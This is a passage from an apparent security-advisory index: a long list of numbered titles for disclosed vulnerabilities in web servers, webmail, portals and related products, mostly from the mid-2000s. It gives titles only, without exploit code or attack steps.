Cross-Site Scripting Attacks [1017706] CA eTrust Intrusion Detection Administration Interface Lets Remote Users Deny Service [1017700] Mozilla Firefox Custom Cursor May Let Remote Users Spoof Portions of the User Interface [1017699] Mozilla Firefox Cache Collision May Let Remote Users Obtain Cached Web Page Contents [1017628] SAP Web Application Server Lets Remote Users Traverse the Directory and Deny Service [1017558] Symantec Web Security Input Validation Hole Permits Cross-Site Scripting and Denial of Service Attacks [1017549] FreeWebshop Include File Bug in '/includes/login.php' Lets Remote Users Execute Arbitrary Code [1017525] WebLogic Bugs Let Remote Users Gain Access, Obtain Information, and Deny Service [1017521] WebLogic Portal Policy Modification Errors May Let Remote Users Access Resources [1017519] WebLogic Certificate Validation Error May Let Remote Users Access the System in Certain Cases [1017465] Cisco Clean Access Lets Remote Users Access the Administrative Interface and Download Backup Files [1017455] AIDeX WebServer Lets Remote Users Deny Service By Sending Multiple Requests [1017324] Sun Java System Web Proxy Server Lets Remote Users Conduct HTTP Request Smuggling Attacks [1017323] Sun Java System Web Server Lets Remote Users Conduct HTTP Request Smuggling Attacks [1017287] MailEnable Grants Administrative Access to .NET WebAdmin Service to Remote Users [1017271] Mozilla Firefox Password Manager Can Disclose Passwords and Other Form Values to Remote Websites [1017239] Kerio WebSTAR Lets Certain Local Users Gain Root Privileges [1017200] FreeWebshop Input Validation Holes Permit Cross-Site Scripting Attacks and Include File Attacks [1017170] IBM WebSphere Application Server Input Validation Hole in Error Page 'faultactor' Parameter Permits Cross-Site Scripting Attacks [1017111] Trawler Web CMS Include File Bug in 'path_red2' Parameter Lets Remote Users Execute Arbitrary Code [1017100] Serendipity Input Validation Flaws in Administration Interface Permit Cross-Site Scripting Attacks [1017069] IronWebMail IM_FILE Request Lets Remote Users Traverse the Directory [1017023] WebYep Include File Flaw in 'webyep_sIncludePath' Parameter Lets Remote Users Execute Arbitrary Code [1016998] Symantec Web Security NAVEX15/NAVENG Device Drivers Let Local Users Gain Kernel Level Privileges [1016975] Unicenter Web Services Distributed Management Discloses Files to Remote Users [1016957] Mac OS X WebCore WebKit Memory Management Error Lets Remote Users Execute Arbitrary Code [1016938] WEB//NEWS Include File Flaw in 'parse/parser.php' Lets Remote Users Execute Arbitrary Code [1016821] Mono Web Server 'xsp' Component Lets Remote Users Traverse the Directory [1016789] Web Dictate Lets Remote Users Gain Administrative Access with a Null Password [1016777] Webmin Input Validation Hole Permits Cross-Site Scripting Attacks and Discloses Script Source Code to Remote Users [1016766] MaxDB Buffer Overflow in WebDBM Service Lets Remote Users Execute Arbitrary Code [1016733] Java Web Start May Let Remote Users Exploit Old Vulnerabilities [1016682] TinyWebGallery Include File Bug in 'image' Parameter Lets Remote Users Execute Arbitrary Code [1016670] Archangel Weblog Input Validation Holes in 'Name' and 'Comment' Parameters Permit Cross-Site Scripting Attacks [1016648] GroupWise WebAccess Input Validation Holes in the Login Page and Other Pages Permit Cross-Site Scripting Attacks [1016637] CA eTrust Antivirus WebScan Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016596] Sun Java System Web Server UTF-8 URI Mapping Error Lets Remote Users View Certain Files [1016563] FireWall-1/VPN-1 Input Validation Hole in PKI Web Service Lets Remote Users View Files on the Underlying System [1016513] IceWarp Web Mail Include File Bug in 'language' and Other Parameters Lets Remote Users Execute Arbitrary Code [1016476] Cisco Router Web Setup Tool Uses an Unsafe IOS Router Configuration By Default [1016463] Webvizyon Portal Input Validation Flaw in 'ID' Parameter Lets Remote Users Inject SQL Commands [1016454] MIMEsweeper for Web Input Validation Hole in 'Access Denied' Page Permits Cross-Site Scripting Attacks [1016446] WebEx Downloader Lets Remote Users Download and Execute Arbitrary Files [1016435] PhpWebGallery Input Validation Flaw in 'comments.php' Permits Cross-Site Scripting Attacks [1016375] Webmin for Windows Error in Parsing '\' Backslash Character Permits Directory Traversal Attacks [1016341] WeBBoA Hosting Script Input Validation Flaw Lets Remote Users Inject SQL Commands [1016334] Mambo Server Input Validation Hole in 'Weblinks' Module Lets Remote Users Inject SQL Commands [1016280] Microsoft Outlook Web Access Input Validation Hole Permits Cross-Site Scripting Attacks [1016276] Cabacos Web CMS Input Validation Hole in Search Form Permits Cross-Site Scripting Attacks [1016268] LogiSphere Web Service Input Validation Hole Permits Cross-Site Scripting Attacks [1016252] Cisco WebVPN Input Validation Hole in 'dnserror.html' Permits Cross-Site Scripting Attacks [1016197] F-Secure Internet Gatekeeper Buffer Overflow in Web Console May Let Remote Users Execute Arbitrary Code [1016196] F-Secure Anti-Virus for Microsoft Exchange Buffer Overflow in Web Console May Let Remote Users Execute Arbitrary Code [1016179] WebCalendar Include File Bug in 'includes/config.php' Lets Remote Users Execute Arbitrary Code [1016160] V-webmail Include File Bug in 'pear_dir' Parameter Lets Remote Users Execute Arbitrary Code [1016143] Apple Xcode Tools Grants Remote Access to WebObjects Projects [1016133] Fujitsu MyWeb Product Line Input Validation Flaw Permits SQL Injection Attacks [1016125] Sun Java System Web Server Default Error Page Input Validation Hole PermitsCross-Site Scripting Attacks [1016116] Spymac Web OS Multiple Input Validation Holes Permit Cross-Site Scripting Attacks [1016110] Resin Input Validation Flaw in Documentation Viewer Lets Remote Users Traverse the Web Root Directory [1016109] Resin Input Validation Flaw in the Built-in Web Server Lets Remote Users Traverse the Directory By Specifying an Absolute Path [1016103] WebLogic Server JTA Transactions May Be Sent Unencrypted [1016102] WebLogic Server Quality of Service Error Causes Transaction Coordinator Messages to Be Sent Unencrypted [1016101] WebLogic Server Admin Password Reset Mechanism May Disclose the Password to Local Users [1016100] WebLogic JSP Compilation Error May Allow Remote Users to View JSP Source Code [1016099] WebLogic Server Console Displays the Domain Name Prior to Authentication [1016098] WebLogic Server Records Failed User Passwords in the Server Log File [1016097] WebLogic Server May Incorrectly Remove JDBC Security Policies [1016096] WebLogic Server May Disclose Internal Network Addresses [1016095] WebLogic Server May Let Applications Obtain Private Keys [1016094] WebLogic 'stopWebLogic.sh' Displays the Administrative Password When Typed By the Administrator [1016040] Cisco PIX Firewall Lets Remote Users Bypass Websense Content Filtering With Fragmented Requests [1016039] Cisco Firewall Service Module (FWSM) Lets Remote Users Bypass Websense Content Filtering With Fragmented Requests [1016038] D-Link DSL-G604T Wireless Router Bug in 'webcm' Script in 'getpage' Parameter Lets Remote Users Traverse the Directory [1016027] Web4Future News Portal Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks [1015960] Neuron Blog Input Validation Holes in 'name' and 'website' Parameters Let Remote Users Conduct Cross-Site Scripting Attacks [1015942] phpWebSite Include File Bug in 'hub_dir' Parameter May Let Remote Users Execute Arbitrary Code [1015878] Aweb's Scripts Seller Lets Remote Users Bypass Authorization and Download Files Without Paying [1015877] Aweb's Banner Generator Input Validation Hole in 'banner' Parameter Permits Cross-Site Scripting Attacks [1015861] McAfee WebShield Format String Bug in Composing Bounce Messages Lets Remote Users Execute Arbitrary Code [1015857] IBM WebSphere Lets Remote Users Deny Service By Sending Large HTTP Header Values [1015818] Maian Weblog Input Validation Bugs in 'print.php' and 'mail.php' Permit SQL Injection [1015792] WebLogic Server Default Internal Servlet May Let Remote Users Access the Local File System [1015791] WebLogic Portal May Disclose a User's JSR-168 Portlet Contents [1015790] WebLogic XML Document Parsing Memory Error Lets Remote Users Deny Service [1015716] IBM WebSphere Application Server May Disclose JavaServer Pages Source to Remote Users [1015702] SAP Web Application Server Lets Remote Users Inject Data into HTTP Responses [1015689] Archangel Weblog Authentication Weakness Lets Remote Users Gain Administrator Privileges [1015648] Xerox WorkCentre Multiple Bugs in ESS/Network Controller and MicroServer Web Server Permit Remote Access, Denial of Service, and Cross-Site Scripting Attacks [1015630] Microsoft Windows Web Client Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1015610] IBM Domino Web Access Input Validation Flaws Permit Cross-Site Scripting Attacks [1015597] Java Web Start Bug Lets Remote Applets Gain Privileges on the Target User's System [1015582] IBM Tivoli Access Manager Input Validation Hole in Web Server Plug-in 'pkmslogout' Script Lets Remote Authenticated Users Traverse the Directory [1015528] BEA WebLogic Multiple Bugs Let Remote Users Deny Service, Obtain Information, and Access Restricted Resources [1015522] WebspotBlogging Input Validation Hole in 'login.php' Permits SQL Injection Attacks [1015459] Microsoft Windows Embedded Web Fonts Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015450] TheWebForum Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks [1015443] Apple AirPort Base Station Lets Remote Users Deny Service on the Network Interface [1015434] Linux Kernel sysctl() Interface Unregistration Error Lets Local Users Deny Service [1015431] Open-Xchange Web Mail Input Validation Hole Permits Cross-Site Scripting Attacks [1015428] BlackBerry Web Browser Bug in Processing JAD Files Lets Remote Users Deny Service [1015422] VMware ESX Server Input Validation Flaw in Management Interface Log Viewer Permits Cross-Site Scripting Attacks [1015412] IceWarp Web Mail Multiple Include File Bugs Let Remote Users Execute Arbitrary Code [1015410] DEV web management system Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks [1015360] IBM WebSphere Input Validation Flaws in Certain Sample Scripts Permits Cross-Site Scripting Attacks [1015355] BusinessObjects Web Intelligence Lets Remote Users Lock Out Arbitrary Accounts [1015350] Microsoft Internet Explorer Bug in Using HTTPS Proxies May Disclose Web URLs to Remote Users [1015336] HP Secure Web Server for Tru64 UNIX XMLRPC Bug Lets Remote Users Execute Arbitrary PHP Code [1015335] Website Baker Username Input Validation Error Lets Remote Users Inject SQL Commands [1015331] Sun Solaris Sun Update Connection Services May Disclose Web Proxy Password to Local Users [1015301] FreeWebStat Input Validation Holes Permit Cross-Site Scripting Attacks [1015294] Apple Safari WebKit Buffer Overflow May Let Remote Users Execute Arbitrary Code and Other Bugs May Permit JavaScript Dialog Box Spoofing and File Download Location Modification [1015255] IBM WebSphere on z/OS Double-Free Bug Lets Remote Users Crash the Service [1015234] LiteSpeed Web Server Input Validation Flaw in 'confMgr.php' Permits Cross-Site Scripting Attacks [1015174] SAP Web Application Server Input Validation Holes Permit HTTP Response Splitting, Cross-Site Scripting, and Phishing Attacks [1015164] Asterisk Web-Voicemail Discloses Voicemail Messages to Remote Authenticated Users [1015143] F-Secure Anti-Virus for Microsoft Exchange Web Console May Disclose Files to Remote Users [1015142] F-Secure Internet Gatekeeper Web Console May Disclose Files to Remote Users [1015134] IBM WebSphere Session Manager Tracing May Disclose Potentially Sensitive Information [1015117] RockLiffe MailSite Express WebMail Discloses WebMail Files to Remote Users and Permits Cross-Site Scripting Attacks [1015105] RSA ACE/Agent for Web Input Validation Error in 'image' Parameter Lets Remote Users Conduct Cross-Site Scripting Attacks [1015089] eBASEweb Input Validation Flaw Permits SQL Injection Attacks [1015083] Symantec LiveUpdate Java Interface Lets Local Users Gain Elevated Privileges [1015046] GFI MailSecurity Web Module Buffer Overflow in Processing HTTP Headers Lets Remote Users Execute Arbitrary Code [1015040] Microsoft Windows Shell Bugs in Processing '.lnk' Files and in Web View Preview Mode Lets Remote Users Execute Arbitrary Code [1015029] BEA WebLogic Server Multiple Bugs Let Remote Users Deny Service, Obtain Information, and Conduct Cross-Site Scripting Attacks [1015012] Webroot Desktop Firewall Lets Local Users Gain Elevated Privileges or Disable the Firewall [1015001] Symantec Anti Virus Scan Engine Buffer Overflow in Web Service Lets Remote Users Execute Arbitrary Code [1014993] Virtools Web Player Buffer Overflow and Directory Traversal [1014964] Apple Safari Web Archive Feature Lets Remote Users Conduct Cross-Site Scripting Attacks [1014951] Webmin Input Validation Error in Processing PAM Authentication Lets Remote Users Execute Arbitrary Commands [1014928] Spymac Web OS Input Validation Weakness in 'showthread.php' Permits Cross-Site Scripting Attacks [1014910] vxWeb Can Be Crashed By Remote Users [1014900] Content2Web Lets Remote Users Inject SQL Commands, Conduct Cross-Site Scripting Attacks, and Include Local Files [1014898] Sun Java Application Server Discloses Web Application Jar File Contents to Remote Users [1014894] Linksys WRT54G Router Administration Interface Bugs Let Remote Users Modify the Configuration, Execute Arbitrary Code, or Deny Service [1014883] Spymac Web OS Input Validation Hole in 'category' Parameter Permits Cross-Site Scripting Attacks [1014875] Sun Java Web Proxy Server Error in Processing Certain POST Requests May Let Remote Users Deny Service [1014867] WebArchiveX 'Safe for Scripting' Setting Lets Remote Users Read and Write Files [1014866] WEB//NEWS Input Validation Hole in 'modules/startup.php' Lets Remote Users Inject SQL Commands [1014856] SqWebMail Lets Remote Users Inject Scripting Code via 'Conditional Comments' [1014849] WebCalendar Include File Bug in 'includedir' Parameter Lets Remote Users Execute Arbitrary Code [1014829] Microsoft Windows Firewall User Interface May Not Properly Display Exception Rules [1014810] SqWebMail Bug in Filtering IMG Tags Lets Remote Users Inject Arbitrary Scripting Code [1014807] phpWebNotes Include File Error in 'php_api.php' Lets Remote Users Execute Arbitrary Commands [1014759] WebLogic Portal Access Control Flaw May Grant Remote Users Access to Entitled Pages [1014757] Cisco Intrusion Prevention System Command Line Interface Bug Lets Authenticated Users Gain Elevated Privileges [1014748] SaveWebPortal Include File Bug Lets Remote Users Code Execute Arbitrary Code and Authentication Flaw Grants Administrative Access [1014720] Xerox Document Centre MicroServer Web Server Bugs Let Remote Users Bypass Authentication, View Files, and Deny Service [1014716] phpWebSite Input Validation Hole in 'Module' Parameter Permits SQL Injection [1014707] Apple Mac OS X SecurityInterface May Disclose Passwords to Authenticated Administrators [1014699] HItoolbox May Disclose Secure Information via the VoiceOver Interface [1014694] Apple Weblog Server Input Validation Hole Permit Cross-Site Scripting Attacks [1014641] Microsoft Internet Explorer Web Folder URL Validation Bug Lets Remote Users Execute Scripting Code in an Arbitrary Security Domain [1014628] Acunetix Web Vulnerability Scanner Web Sniffer Can Be Crashed By Remote Users [1014624] NetworkActiv Web Server Input Validation Flaw Permits Cross-Site Scripting Attacks [1014616] 'web content management' Lets Remote Users Add Administrative Accounts or Conduct Cross-Site Scripting Attacks [1014590] McAfee WebShield Appliance Default Password May Grant Access to Remote Users [1014582] SPI Dynamics WebInspect Reporting Function Lets Remote Sites Execute Scripting Code on the Target System [1014559] KF Web Server Discloses Directory Listings to Remote Users [1014535] Website Generator Image Upload Preview Lets Remote Users Execute Arbitrary Code [1014515] Novell GroupWise Webaccess Lets Remote Users Conduct Cross-Site Scripting Attacks [1014480] Web-Portal-System 'wps_shop.cgi' Remote Command Execution [1014456] MIMEsweeper for Web May Let Remote Code Bypass the Portable Code Manager [1014441] nCipher Cryptographic Hardware Interface Library (CHIL) Discloses Random Cache to Forked Processes [1014429] Xerox WorkCentre Pro Web Service Lets Remote Users Bypass Authentication, Obtain Files, Modify Web Pages, or Deny Service [1014417] Microsoft Windows Named Pipe NULL Session Bugs in svcctl and eventlog RPC Interfaces Disclose Information to Remote Users [1014385] ASPWebMail Discloses Database to Remote Users [1014369] SunONE Web Server May Allow Remote Users to Conduct HTTP Response Smuggling Attacks [1014368] Oracle Application Server Web Server May Allow Remote Users to Conduct HTTP Response Smuggling Attacks [1014367] IBM WebSphere May Allow Remote Users to Conduct HTTP Response Smuggling Attacks [1014366] BEA WebLogic May Allow Remote Users to Conduct HTTP Response Smuggling Attacks [1014360] Oracle Application Server Web Cache Lets Remote Users Conduct HTTP Request Smuggling Attacks [1014358] Sun Java System Web Proxy Server Lets Remote Users Conduct HTTP Request Smuggling Attacks [1014357] Check Point FireWall-1 HTTP Request Smuggling May Let Remote Users Bypass Web Intelligence Features [1014352] Microsoft Front Page May Crash When Editing a Specially Crafted Web Page [1014268] Asterisk Buffer Overflow in Manager Interface Lets Remote Authenticated Users Execute Arbitrary Code [1014235] Sun ONE Messaging Server Lets Remote Users Execute Arbitrary Code on a Target Webmail User's System [1014231] Yaws Web Server Discloses Script Source Code to Remote Users [1014199] Microsoft Outlook Web Access Input Validation Hole in IMG Tags Permits Cross-Site Scripting Attacks [1014196] Microsoft Windows Buffer Overflow in Web Client Service Lets Remote Authenticated Users Execute Arbitrary Code [1014191] Java Web Start java-vm-args Lets Remote Users Access and Execute Files on the Target User's System [1014173] WebHints Input Validation Bug Lets Remote Users Execute Arbitrary Commands [1014135] Cisco 802.1x Voice-Enabled Interfaces Grant Anonymous Voice VLAN Access [1014132] IBM AIX Buffer Overflows in invscout, paginit, diagTasksWebSM, getlvname, and swcons Commands and Multiple p Commands Let Local Users Execute Arbitrary Code [1014123] IBM WebSphere Application Server Buffer Overflow in Administrative Console Lets Remote Users Execute Arbitrary Commands [1014104] WWWeb Concepts Events System 'login.asp' Input Validation Hole Permits SQL Injection [1014096] LiteWeb Lets Remote Users Access Restricted Pages [1014049] BEA WebLogic Server and WebLogic Portal Have Multiple Vulnerabilities [1014048] MaxWebPortal Input Validation Hole in 'password.asp' Permits SQL Injection [1014027] Gentoo webapp-config Unsafe Temporary File Lets Local Users Gain Elevated Privileges [1013979] Sigma ISP Manager Input Validation Flaw in 'sigmaweb.dll' Permits SQL Injection [1013945] Windows Media Player License Acquisition Feature May Let Remote Users Redirect Users to Arbitrary Web Pages [1013940] Guestbook PRO for WebAPP Input Validation Holes in Content and Title Let Remote Users Conduct Cross-Site Scripting Attacks [1013932] MaxWebPortal Has Additional Input Validation Holes in Multiple Scripts That Permit SQL Injection and Grant Remote Administrative Access [1013902] Jeuce Personal Web Server Can Be Crashed By Remote Users [1013859] Open WebMail Input Validation Hole Prior to open() Call Lets Remote Users Execute Arbitrary Commands [1013845] MaxWebPortal Has Input Validation Holes in Multiple Scripts That Permit SQL Injection and Grant Remote Administrative Access [1013836] JustWilliam's Amazon Webstore Input Validation Holes Permit Cross-Site Scripting Attacks [1013821] MaxDB Buffer Overflow in getIfHeader() WebDAV Function Lets Remote Users Execute Arbitrary Code [1013817] BEA WebLogic Administration Console Input Validation Hole in 'JndiFramesetAction' Permits Cross-Site Scripting Attacks [1013802] SqWebMail Input Validation Hole in 'redirect' Parameter Permits HTTP Response Splitting Attacks [1013800] MaxDB Buffer Overflow in getLockTokenHeader() WebDAV Function Lets Remote Users Execute Arbitrary Code [1013791] Novell Nsure Audit 'webadmin.exe' Lets Remote Users Cause the System to Stop Responding [1013761] Microsoft Windows Explorer 'webvw.dll' Input Validation Error Lets Remote Users Execute Arbitrary Scripting Code [1013757] WheresJames Webcam Publisher Buffer Overflow Lets Remote Users Execute Arbitrary Code [1013753] WebcamXP Lets Remote Users Redirect Chat Sessions and Deny Service [1013748] PMSoftware Simple Web Server Buffer Overflow Lets Remote Users Execute Arbitrary Code [1013724] RSA Authentication Agent for Web for IIS Input Validation Bug Lets Remote Users Conduct Cross-Site Scripting Attacks [1013723] Webmin May Let Users Change the Permissions and Ownership of Configuration Files [1013708] Kerio MailServer WebMail Viewing Flaw Lets Remote Users Deny Service [1013697] IBM WebSphere May Disclose JSP Source to Remote Users Sending Invalid Host Headers [1013669] Microsoft Outlook Web Access 'From' Address Display Lets Remote Users Spoof Origination Addresses [1013633] Turnkey Websites Shopping Cart Input Validation Bugs Let Remote Users Inject SQL Commands [1013617] MaxWebPortal Input Validation Holes in 'events_functions' and 'links_add_form' Permit SQL Injection and Cross-Site Scripting Attacks [1013598] WebAPP Discloses 'dat' Files to Remote Users [1013465] McAfee WebShield Buffer Overflow in Processing LHA Headers Lets Remote Users Execute Arbitrary Code [1013435] IBM WebSphere Commerce May Disclose Login IDs and Other Information to Remote Users [1013430] MaxDB Web Agent Can Be Crashed By Remote Users Sending Invalid DBM Parameters [1013411] WEBinsta Limbo Include File Flaw Lets Remote Users Execute Arbitrary Commands [1013409] WEBinsta Website Mailing list manager Include File Flaw Lets Remote Users Execute Arbitrary Commands [1013397] phpWebLog Include File Flaw Lets Remote Users Execute Arbitrary Commands [1013388] Xerox WorkCentre Bug in Web Server Lets Remote Users Modify the Configuration [1013335] WebMod Buffer Overflow in Processing POST Requests May Let Remote Users Execute Arbitrary Code [1013312] CIS WebServer Discloses Files Outside of the Document Directory to Remote Users [1013298] phpWebSite Announce Module Image Files Let Remote Users Execute Arbitrary PHP Code [1013248] Xinkaa WEB Station Discloses Files Outside of the Document Directory to Remote Users [1013245] WebConnect Discloses Files to Remote Users and Can Be Crashed By Remote Users [1013231] WebCalendar user_valid_crypt function() Input Validation Error Lets Remote Users Inject SQL Commands [1013178] PHP-Nuke Input Validation Holes in Downloads 'newdownloadshowdays' and Web Links 'newlinkshowdays' Permit Cross-Site Scripting Attacks [1013177] BEA WebLogic Discloses the Reason for Authentication Failure to Remote Users [1013172] Open WebMail Input Validation Flaw in 'logindomain' Lets Remote Users Conduct Cross-Site Scripting Attacks [1013099] OmniWeb IDN Implementation Lets Remote Users Spoof URLs and SSL Certificates [1013086] Microsoft Outlook Web Access 'owalogon.asp' Lets Remote Users Redirect Login Requests [1013046] Eternal Lines Web Server Lets Remote Users Deny Service With Multiple Simultaneous Connections [1013038] WebAdmin useredit_account.wdm Permits Cross-Site Scripting Attacks and Lets Remote Authenticated Users Access Other Accounts [1013036] WebWasher Classic Lets Remote Users Connect to Localhost Ports [1013017] Magic Winmail Server Input Validation Holes in Webmail and IMAP Services Allow Directory Traversal Attacks [1013015] Cisco IOS MPLS Disabled Interfaces Let Remote Users Deny Service [1012988] SquirrelMail Input Validation Flaw in webmail.php May Let Remote Users Execute Arbitrary Commands or Conduct Cross-Site Scripting Attacks [1012928] Novell GroupWise WebAccess Lets Remote Users Bypass Authentication to Gain Limited Access [1012893] MySQL MaxDB Buffer Overflow in websql Password Parameter Lets Remote Users Execute Arbitrary Code [1012855] eMotion MediaPartner Web Server Discloses BHTML Source Code to Remote Users [1012854] Bottomline WebSeries Discloses Information to Remote Authenticated Users and Lets Users Bypass Password Policy [1012796] Dillo Format String Flaw in a_Interface_msg() May Let Remote Users Execute Arbitrary Code [1012791] Jeuce Personal Web Server Discloses Files to and Can Be Crashed by Remote Users [1012745] KorWeblog 'install/index.php' Include File Flaw Lets Remote Users Execute Arbitrary Code [1012676] Picosearch Input Validation Flaw Lets Remote Users Spoof Web Site Contents [1012657] e107 website system Include File Flaw in ImageManager Lets Remote Users Execute Arbitrary Code [1012603] uml_utilities umt_net slip_down() Lets Local Users Disable the Ethernet Interfaces [1012585] Sun ONE Messaging Server Bug in Webmail Lets Remote Users Access E-mail Accounts [1012579] pgn2web Buffer Overflow in process_moves() Lets Remote Users Execute Arbitrary Code [1012537] iWebNegar Input Validation Bug Lets Remote Users Inject SQL Commands [1012505] Sun Java System Web Server Lets Remote Users Access Active Sessions [1012451] WebLibs Discloses Text Files to Remote Users [1012449] MaxDB WebTools WebDav Stack Overflow Lets Remote Users Execute Arbitrary Code With Root Privileges [1012312] KorWeblog Input Validation Error in 'viewing.php' Lets Remote Users Obtain Directory Listings [1012305] NuKed-KlaN Input Validation Hole in Web Site Links Permits Cross-Site Scripting Attacks [1012226] Webroot Spy Sweeper Enterprise Discloses Administrative Password to Local Users [1012200] phpWebSite Input Validation Flaws Let Remote Users Conduct HTTP Response Splitting Attacks [1012173] 04WebServer Input Validation Holes Let Remote Users Inject Log Entries and Conduct Cross-Site Scripting Attacks [1012168] WebCalendar Grants Administrative Access and Permits Cross-Site Scripting and HTTP Response Splitting Attacks [1012166] Cisco IOS Interfaces Can Be Blocked With Specially Crafted DHCP Packets [1012159] Sun ONE Messaging Server Lets Remote Users Hijack Webmail Accounts [1012158] NETGEAR DG834 Management Interface Can Be Blocked With Many Simultaneous Sessions [1012155] Microsoft Internet Security and Acceleration Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites [1012154] Microsoft Proxy Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites [1012099] Merak Mail Server (with IceWarp Web Mail) Lets Remote Authenticated Users Move, Delete, and Rename Files [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service [1012077] MailEnable Webmail Vulnerability Has Unspecified Impact [1012060] Sun Java System Web Server Various Certificate and ASN.1 Bugs Let Remote Users Crash the Service [1012048] Forum Web Server Still Discloses Files on the System, Including Clear Text Passwords, to Remote Users [1012005] Sun Java System Web Proxy Server Buffer Overflow May Let Remote Users Execute Arbitrary Code [1011997] Caudium Web Server Off-by-One Error May Let Remote Users Execute Arbitrary Code [1011986] Cyber Web Filter IP Address Web Blocking Can Be Bypassed [1011962] OmniWeb Browser Multi-Window Browsing Errors Let Remote Users Spoof Sites [1011877] cPanel Webmail Only Requires First Eight Characters of Password [1011812] Abyss Web Server Bug in Processing MS-DOS Device Names Lets Remote Users Deny Service [1011792] Netscape Web Mail 'msglist.adp' Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks [1011791] AOL Web Mail 'msglist.adp' Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks [1011633] Microsoft IIS WebDAV XML Message Handler Error Lets Remote Users Deny Service [1011618] IceWarp Web Mail Has Cross-Site Scripting Flaws and an Unspecified 'view.html' Vulnerability [1011550] Express-Web Input Validation Error Lets Remote Users Conduct Cross-Site Scripting Attacks [1011541] NetworkActiv Web Server Lets Remote Users Deny Service [1011462] aspWebCalendar Discloses Whether Account Names Exist to Remote Users [1011461] MyWebServer Grants Administrative Access and Discloses Files to Remote Users [1011422] Web Wiz Journal Discloses Database to Remote Users [1011421] Web Wiz Internet Search Engine Discloses Database to Remote Users [1011411] aspWebAlbum Input Validation Holes Let Remote Users Inject SQL Commands [1011410] aspWebCalendar Input Validation Holes Let Remote Users Inject SQL Commands [1011346] Business Objects WebIntelligence Input Validation Holes Let Remote Users Conduct Cross-Site Scripting Attacks [1011345] Business Objects WebIntelligence Access Control Lets Remote Authenticated Users Delete Documents Without Permission [1011334] DNS4Me Lets Remote Users Crash the Web Service and Conduct Cross-Site Scripting Attacks [1011268] Webmin 'maketemp.pl' Unsafe Temporary Directory Lets Local Users Gain Elevated Privileges [1011235] Pingtel xpressa Boundary Error in HTTP Management Interface Lets Remote Authenticated Users Crash the Phone [1011234] WebLogic May Transmit Sensitive Information in Clear Text When the Administration Port is Not Enabled [1011233] WebLogic Active Directory LDAP Error May Fail to Disable User Accounts [1011232] WebLogic Server May Deploy With Incomplete Security When an Error Occurs During Deployment [1011231] WebLogic Discloses System Version Information to Remote Users [1011230] WebLogic Administrative Console May Display Passwords in Certain Cases [1011229] WebLogic Command and Administrative Scripts May Contain Clear Text Passwords [1011228] WebLogic Case-Sensitive 'web.xml' Patterns May Let Remote Users Access Restricted URLs [1011227] WebLogic Server Lets Remote Users Execute Some Administration Commands [1011226] BEA WebLogic May Disclose Some Internal Server Objects to Remote Users [1011173] Usermin Web Mail HTML Filtering Flaw Lets Remote Users Execute Arbitrary OS Commands [1011120] phpWebSite Input Validation Bugs in 'cal_template' and Other Parameters Permit SQL Injection and Cross-Site Scripting Attacks [1011092] Xedus Web Server Input Validation Flaws Disclose Files to Remote Users and Permit Cross-Site Scripting Attacks [1011073] Dynix WebPAC Input Validation Holes Let Remote Users Inject SQL Commands [1011065] Cisco Secure Access Control Server Lets Remote Users Access the Administrative Interface or Deny Service [1011053] WebAPP Input Validation Flaw Lets Remote Users View Arbitrary Files [1011052] Webroot Window Washer Does Not Properly Overwrite Erased Files [1011048] Webmatic Security Flaw Has Unspecified Impact [1011045] Easy File Sharing Web Server Discloses All Files on the Disk to Remote Users [1011012] Novell Web Manager May Grant Remote Users Access to the WEB-INF Folder [1011010] Nihuo Web Log Analyzer Lack of Input Validation in User-Agent and Referer Fields Permits Cross-Site Scripting Attacks [1011007] BadBlue Web Server Service Can Be Denied With Multiple Connections from the Same Host [1010933] Clearswift MIMEsweeper for Web Discloses Files to Remote Users [1010932] KDE Temporary File Bugs Let Local Users Gain Elevated Privileges and Frame Injection Flaw Lets Remote Users Spoof Web Sites [1010916] Microsoft Outlook Web Access Input Validation Hole in Redirection Query Permits Cross-Site Scripting Attacks [1010904] Apple Safari May Disclose Web Form POST Data to Remote Servers Via GET Methods [1010851] Free Web Chat Username Input Validation Error Lets Remote Users Deny Service [1010835] Webbsyte Chat Can Be Crashed By Remote Users [1010824] Webcam Watchdog Input Validation Hole in 'sresult.exe' Permits Cross-Site Scripting Attacks [1010797] IBM WebSphere Can Be Crashed By Remote Users Sending Large HTTP Headers [1010780] Opera Web Browser Javascript 'location.replace' Lets Remote Users Spoof Address Bar [1010774] Firefox State Error Lets Remote Server Spoof Arbitrary Secure Web Sites [1010768] EasyWeb FileManager Discloses Files to Remote User [1010753] Samba Buffer Overflows in Web Administration Tool and in 'hash' Mangling Method May Let Remote Users Execute Arbitrary Code [1010751] Xitami Web Server Can Be Crashed By Remote Users Sending Invalid HTTP Headers [1010727] eXtropia WebStore Input Validation Bug Lets Remote Users Execute Arbitrary Commands [1010696] 4D WebSTAR Grants Access to Remote Users and Elevated Privileges to Local Users [1010680] INweb Mail Lets Remote Users Deny Service By Multiple Connections in Rapid Succession [1010639] IBM WebSphere Edge Server Component Caching Proxy JunctionRewrite Directive Lets Remote Users Deny Service [1010631] Enceladus Server Suite Input Validation Error in Web Service Discloses Files and Directory Listings to Remote Users [1010613] Pavuk Buffer Overflow in Processing HTTP Location Headers Lets Remote Web Servers Execute Arbitrary Code on the Target System [1010610] Microsoft IIS Web Server May Disclose Private IP Addresses in Certain Cases [1010607] HP Object Action Manager WebAdmin Flaw May Yield Access to Remote Users [1010605] Open WebMail Input Validation Flaw in 'vacation.pl' Lets Remote Users Execute Arbitrary Programs [1010602] BEA WebLogic role-name Tag Error May Let Remote Users Access Applications [1010593] Infinity WEB Input Validation Error Lets Remote Users Inject SQL Commands [1010568] ArbitroWeb Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks [1010560] SqWebMail Input Validation Bug in print_header_uc() Lets Remote Users Conduct Cross-Site Scripting Attacks [1010528] Opera Web Browser CSS IFrame Lets Remote Users Spoof the Address Bar [1010511] webAuction Lets Remote Users Delete Auction Items [1010506] Webmin Account Lockout Can Be Bypassed By Remote Users [1010497] Web Wiz Forums 'registration_rules.asp' Input Validation Bug Lets 